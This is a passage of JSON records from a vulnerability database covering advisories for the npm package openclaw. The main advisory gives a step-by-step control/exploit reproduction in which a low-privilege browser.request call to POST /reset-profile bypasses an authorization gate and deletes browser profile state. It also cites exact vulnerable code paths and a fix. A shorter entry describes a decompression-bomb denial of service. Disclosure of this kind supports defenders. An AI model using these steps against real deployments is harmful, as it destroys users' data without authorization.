ID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41399","GHSA-f44p-c7w9-7xr7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-37ep-9smd-zuh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90971?format=json","vulnerability_id":"VCID-384t-z1h8-pfft","summary":"OpenClaw: `browser.request` still allows `POST /reset-profile` through the `operator.write` surface\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Title\n\n`browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q`\n\n## Severity Assessment\n\nHigh\n\nCWE:\n\n- `CWE-863: Incorrect Authorization`\n\nProposed CVSS v3.1:\n\n- `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`)\n\nAn authenticated caller who only has access to the scoped Gateway method `browser.request` on the `operator.write` surface can still reach a destructive persistent-profile management route.\n\nLikely related advisory family:\n\n- `GHSA-vmhq-cqm9-6p7q`\n\nThis should be treated as a later-version residual or incomplete fix. The earlier fix blocked `POST /profiles/create` and profile deletion, but the latest released `v2026.3.22` code still omits `POST /reset-profile` from the same mutation gate.\n\n## Impact\n\nA caller with `operator.write` access to `browser.request` can still trigger persistent profile reset via `POST /reset-profile`.\n\nThis crosses the intended privilege boundary for browser profile management because the release already attempts to block adjacent persistent profile mutations on this same surface.\n\nIn practice, the allowed route reaches destructive behavior that can:\n\n- stop the running browser for that profile\n- close the Playwright browser connection for that profile\n- move the profile's local `userDataDir` to Trash when it exists\n\nThis is a real integrity and availability impact on persistent browser state, not a route-classification mismatch with no side effects.\n\n## Affected Component\n\nProduct:\n\n- `openclaw`\n\nTested latest released version:\n\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n\nPublished artifact for that release:\n\n- package: `openclaw-2026.3.22.tgz`\n- package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n- package build-info timestamp: `2026-03-23T10:56:05.946Z`\n\nExact vulnerable paths on the shipped tag:\n\n- `src/gateway/method-scopes.ts:114`\n  - `browser.request` is placed on the `operator.write` surface\n- `src/gateway/server-methods/browser.ts:155-165`\n  - requests are only denied when `isPersistentBrowserProfileMutation(method, path)` returns true\n- `src/browser/request-policy.ts:19-25`\n  - the mutation classifier recognizes `POST /profiles/create` and `DELETE /profiles/:name`, but not `POST /reset-profile`\n- `src/browser/routes/basic.ts:161-170`\n  - the browser server exposes `POST /reset-profile`\n- `src/browser/server-context.reset.ts:37-63`\n  - `resetProfile()` stops the browser, closes the connection, and moves the local profile directory to Trash when present\n- `src/node-host/invoke-browser.ts:240-243`\n  - the same route-classification helper is reused in the browser proxy path when profile restrictions are active\n\nRelevant regression coverage gap on the shipped tag:\n\n- `src/gateway/server-methods/browser.profile-from-body.test.ts:104-140`\n  - tests only block `POST /profiles/create` and `DELETE /profiles/:name`\n  - there is no equivalent deny case for `POST /reset-profile`\n\nPublished artifact evidence for the exact released package:\n\n- `openclaw-2026.3.22.tgz::package/dist/build-info.json`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11469-11525`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11484-11485`\n- `openclaw-2026.3.22.tgz::package/dist/request-policy-nIRryZwZ.js:9-12`\n- `openclaw-2026.3.22.tgz::package/dist/routes-CdaHRCET.js:6874-6889`\n\nImportant release note:\n\n- the published package build-info commit differs from the release tag target commit\n- for this issue, the relevant authorization and route behavior was cross-checked in both the shipped tag source and the published package bundle, and it matches semantically on the vulnerable path\n\n## Technical Reproduction\n\nA direct control/exploit pair can be reproduced against the latest released version.\n\nPreconditions:\n\n- use `openclaw@2026.3.22`\n- authenticate as a caller that has access to the scoped Gateway method `browser.request`\n- keep that caller on `operator.write`, not `operator.admin`\n- ensure the target local browser profile exists\n\nReproduction steps:\n\n1. Call `browser.request` with:\n   - `method: \"POST\"`\n   - `path: \"/profiles/create\"`\n   - `body: { \"name\": \"poc-profile\" }`\n2. Observe the control case is rejected with:\n   - `browser.request cannot create or delete persistent browser profiles`\n3. Call `browser.request` again with:\n   - `method: \"POST\"`\n   - `path: \"/reset-profile\"`\n   - `body: { \"profile\": \"poc-profile\", \"name\": \"poc-profile\" }`\n4. Observe that the exploit case is not rejected by the same handler.\n5. Observe that the request is forwarded to the browser route/dispatcher, rather than being denied by the mutation classifier.\n6. Observe that the reset route succeeds and applies profile reset behavior.\n\nWhy this happens in the released code:\n\n- the release tries to gate persistent profile mutation using `isPersistentBrowserProfileMutation(...)`\n- that helper does not classify `POST /reset-profile` as a protected mutation\n- the exposed browser server route still maps `/reset-profile` to `profileCtx.resetProfile()`\n- `resetProfile()` performs state-changing behavior on the selected local profile\n\n## Demonstrated Impact\n\nThe shipped release shows the following behavior difference:\n\nControl case:\n\n- `POST /profiles/create`\n- rejected before the request is dispatched to the browser control path\n\nExploit case:\n\n- `POST /reset-profile`\n- not classified as a blocked mutation\n- remains reachable through the `browser.request` surface\n- reaches `resetProfile()`, which performs destructive profile-management operations\n\nThe reached route has concrete side effects:\n\n- stops the running browser if active\n- closes the Playwright browser connection\n- moves the profile's local `userDataDir` to Trash if it exists\n\nThis is therefore a concrete authorization and policy gap on a real destructive profile-management route. It is not a complaint about the existence of `browser.request` by itself.\n\n## Environment\n\nEnvironment used for validation:\n\n- product: `openclaw`\n- latest released version: `2026.3.22`\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n- published package: `openclaw-2026.3.22.tgz`\n- published package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n\nExplicit trust-model statement:\n\n- this report does **not** rely on adversarial or mutually untrusted operators sharing one gateway host or config\n\nScope check:\n\n- this is **not** a complaint about the existence of the explicit `browser.request` surface by itself\n- this is **not** a prompt-injection-only report\n- this is **not** a multi-tenant shared-gateway claim\n- this is **not** an attack on the unscoped HTTP compatibility endpoints\n- this is a concrete missed route inside an intended privilege gate on a real scoped Gateway method\n- the control case proves the policy is intended to exist on this surface, and the exploit case proves `POST /reset-profile` remains outside that gate in the shipped release\n\n## Remediation Advice\n\nRecommended fix:\n\n1. Extend the persistent-profile mutation classifier to include `POST /reset-profile`.\n2. Reuse the same centralized route classification everywhere the release currently relies on `isPersistentBrowserProfileMutation(...)`, including:\n   - `src/gateway/server-methods/browser.ts`\n   - `src/node-host/invoke-browser.ts`\n3. Add regression coverage with both:\n   - a deny control for `POST /reset-profile` on the lower-privilege `browser.request` surface\n   - an allow control for non-mutating browser profile reads\n4. Review nearby profile-management routes for any other state-changing endpoints that are still omitted from the mutation classifier.\n5. Treat `GHSA-vmhq-cqm9-6p7q` as the prior family and close the remaining residual route in the same policy surface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35653","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17412","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1737","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17407","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35653"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0","reference_id":"4dcc39c25c6cc63fedfd004f52d173716576fcf0","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35653","reference_id":"CVE-2026-35653","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35653"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a","reference_id":"e7d11f6c33e223a0dd8a21cfe01076bd76cef87a","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a"},{"reference_url":"https://github.com/advisories/GHSA-xp9r-prpg-373r","reference_id":"GHSA-xp9r-prpg-373r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xp9r-prpg-373r"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request","reference_id":"openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35653","GHSA-xp9r-prpg-373r"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-384t-z1h8-pfft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89653?format=json","vulnerability_id":"VCID-38g8-39ek-xbat","summary":"OpenClaw: Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n## Summary\nImage pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 image processing could fail open on oversized pixel counts and allow decompression-bomb DoS, an availability issue that is valid at medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `0ed4f8a72bb140045962e97ab01c94c076b758a4` — 2026-03-31T22:52:55+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2"},{"reference_url":"https://github.com/advisories/GHSA-w85g-3h6x-4xh2","reference_id":"GHSA-w85g-3h6x-4xh2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w85g-3h6x-4xh2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8